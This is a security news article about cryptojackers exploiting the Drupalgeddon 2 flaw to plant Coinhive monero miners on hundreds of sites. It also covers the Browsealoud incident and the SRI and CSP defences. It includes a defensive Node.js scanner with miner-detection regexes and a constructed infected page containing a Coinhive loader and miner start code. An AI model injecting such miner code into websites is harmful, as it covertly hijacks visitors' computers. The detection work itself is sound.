Cryptocurrency Miners Exploit Widespread Drupal Flaw

Researcher: 400 Sites or More Fall Victim to Massive, Forced Monero Mining Operation

The website for San Diego Zoo is one of hundreds that have fallen victim to monero miners via a Drupal flaw. (Source: Bad Packets Report)

A remote code execution vulnerability revealed in late March in the Drupal content management system is now being used on a large scale for mining virtual currency.

The list of websites that have fallen victim to cryptocurrency hijacking attacks now numbers more than 400, with those affected including Lenovo, the India Olympic Association and the San Diego Zoo. Various U.S. government sites, including the National Labor Relations Board and the Office of Inspector General of the U.S. Equal Employment Opportunity Commission, have also been hit.

Those findings come from Troy Mursch, an independent security researcher with Bad Packets Report. He's compiled a list of the websites affected but says the true number is likely far higher.

"There's most definitely more," says Mursch, who published a blog post describing his findings on Saturday. "It's not an exhaustive list. Other sites will unfortunately be detected. At least at this point it's another reminder: Update your Drupal installations or this may happen to you."

Mursch says that as with other mass attacks online, notification is quite a challenge. He's started notifying governments and universities, but is hoping word will spread so other affected sites can be quickly remediated.

Monero Mining

The code planted on the infected websites "mines" the privacy-focused virtual currency monero. Mining is the proof-of-work process by which a blockchain's participants validate batches of transactions and append them as new blocks.

When users visit an infected website, JavaScript served by the page starts computing hashes in their browser as part of a pooled effort to find a valid block. If the pool completes a block, the monero reward is paid out, and it is credited to whoever planted the script, not to the visitor.

A sampling of sites infected with a monero miner. (Source: Bad Packets Report)

Although users who visit an affected site usually remain unaware that their system is being used for mining, the effect is noticeable when the mining script is configured to use a large share of the CPU: pages and applications slow down, fans spin up and laptop batteries drain. It also wastes electricity. The mining ends, however, when the visitor closes the browser tab, since the miner runs only inside that page.

But virtual currency mining is probably the least harmful action that could result from the "highly critical" vulnerability, according to the Drupal SA-CORE-2018-002 security alert.

The remote code execution vulnerability, tracked as CVE-2018-7600, affects Drupal 6, 7 and 8 and could also be used by attackers to fully compromise the underlying server: whoever can run code as the web server can replant the miner after a cleanup, read the site's database credentials or pivot further into the network. The flaw is so severe that its disclosure has been dubbed "Drupalgeddon 2." All Drupal administrators should upgrade immediately to a patched release of Drupal 7 or 8 core (7.58 or 8.5.1), according to the security alert. Patching alone does not remove code an attacker has already planted, so sites that were exposed before upgrading also need to check their templates, database and filesystem for injected scripts and backdoors.

Buzz Around Coinhive

Bad Packets Report's Mursch found the affected websites were loading a slightly modified version of the Monero mining script developed by Coinhive.
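As an added example, and not Bad Packets Report's own tooling, the following Node.js script shows the kind of triage check used to find pages like these: it pulls every script tag out of a page's HTML and flags the ones carrying Coinhive-style miner indicators. The indicator list is an assumption drawn from Coinhive's public loader filename, hostname and JavaScript API, and the sample pages are constructed, not captured from any real site.

```javascript
// Triage scanner for Coinhive-style browser miners in page HTML (added example).
// Indicators are assumed from Coinhive's public loader filename, host and
// JavaScript API; a "slightly modified" loader may rename these, so treat a
// clean result as "no known indicator", not "no miner".
const MINER_INDICATORS = [
  { name: "coinhive-loader", rx: /coinhive\.min\.js/i },
  { name: "coinhive-host", rx: /\bcoinhive\.com\b/i },
  { name: "coinhive-api", rx: /CoinHive\.(Anonymous|User)\s*\(/ },
];

// Pull every <script> tag out of the HTML, keeping its src (if any) and inline body.
// A regex is adequate for a read-only triage pass over fetched HTML.
function extractScripts(html) {
  const scripts = [];
  const tag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Return one finding per matching script tag: which indicator fired and where.
function scanForMiner(html) {
  const findings = [];
  extractScripts(html).forEach((s, index) => {
    const subject = (s.src || "") + "\n" + s.body;
    const hit = MINER_INDICATORS.find((ind) => ind.rx.test(subject));
    if (hit) findings.push({ script: index, src: s.src, indicator: hit.name });
  });
  return findings;
}

// Constructed sample pages (placeholders, not captured from any real site).
const SAMPLE_INFECTED = `<!doctype html><html><head>
<script src="/sites/default/files/js/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER", { throttle: 0.2 });
  miner.start();
</script>
</head><body>Hello</body></html>`;

const SAMPLE_CLEAN = `<html><head><script src="/app.js"></script></head><body>Hello</body></html>`;

// Infected page: two findings (the loader tag and the inline constructor); clean page: none.
console.log(JSON.stringify(scanForMiner(SAMPLE_INFECTED), null, 2));
console.log(JSON.stringify(scanForMiner(SAMPLE_CLEAN)));
```

String indicators catch the common case, which is how the affected sites were spotted, but a loader copied to another host and renamed will slip past them. For a compromised Drupal site the authoritative check is the server side: look for the injected script in the theme templates, the database and any recently modified files under the web root, not just in the rendered HTML.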

Coinhive was the subject of a recent in-depth report by cybersecurity blogger Brian Krebs. The mining code often turns up on hacked websites, although it had been positioned as an alternative method to advertisements for generating website revenue.

Coinhive takes a 30 percent share of mining rewards. Critics have called on the service to, at a minimum, not profit when the code is covertly slipped into websites without users' knowledge.

Infected website: the Office of Inspector General of the U.S. Equal Employment Opportunity Commission. (Source: Troy Mursch)

Scott Helme, a U.K.-based security expert, says that although Coinhive's terms of service prohibit sneaky mining, "there are absolutely no technical measures, whatsoever, in place to stop you from doing so.

"If they wanted to stop their product being abused, which they claim they do because its malicious use is damaging their reputation, they could try to put some technical measures in place," Helme says in a Monday blog post.

In February, attackers managed to subvert an accessibility tool called Browsealoud by inserting the Coinhive miner into a JavaScript library the tool loads.

At least 4,200 websites, including those run by the U.S., U.K. and Australian governments, unwittingly loaded the tainted Browsealoud script, causing their visitors' computers to begin mining monero. The malicious code ran for about four hours before Browsealoud's maker shut it down.

Anti-Mining Defenses

The good news is that there are now a variety of browser extensions that users can install on the client side to detect and block in-browser mining (see Cryptojacking: Mitigating the Impact).

But truly stopping it is the job of website operators, who must ensure they're not compromised in the first place. For the Drupal flaw that means patching core and then checking the site's templates, database and filesystem for the injected script, since a patch does not remove code an attacker has already planted.

Two W3C standards help against the other route in, a tampered third-party script: subresource integrity, or SRI, and content security policy, or CSP. SRI lets a page state, in an integrity attribute on the script tag, the cryptographic hash of the file it expects. The browser hashes what it actually fetched, and if the digests don't match it refuses to run the script. That is exactly the Browsealoud case: a correct integrity value on the tag would have stopped the altered library from loading.

CSP is an allowlisting tool. A script-src directive lists the origins that may supply scripts, and the browser blocks anything else, which includes a Coinhive loader pulled from an unlisted host (see Cryptocurrency Miners: How to Shield Browsers From Bad Guys). Neither control helps once an attacker has code execution on the site itself, as with Drupalgeddon 2: whoever can rewrite the page can also rewrite its integrity values and its policy.

About the Author

Jeremy Kirk

Executive Editor, Security and Technology, ISMG

Kirk was executive editor for security and technology for Information Security Media Group. Reporting from Sydney, Australia, he created "The Ransomware Files" podcast, which tells the harrowing stories of IT pros who have fought back against ransomware.
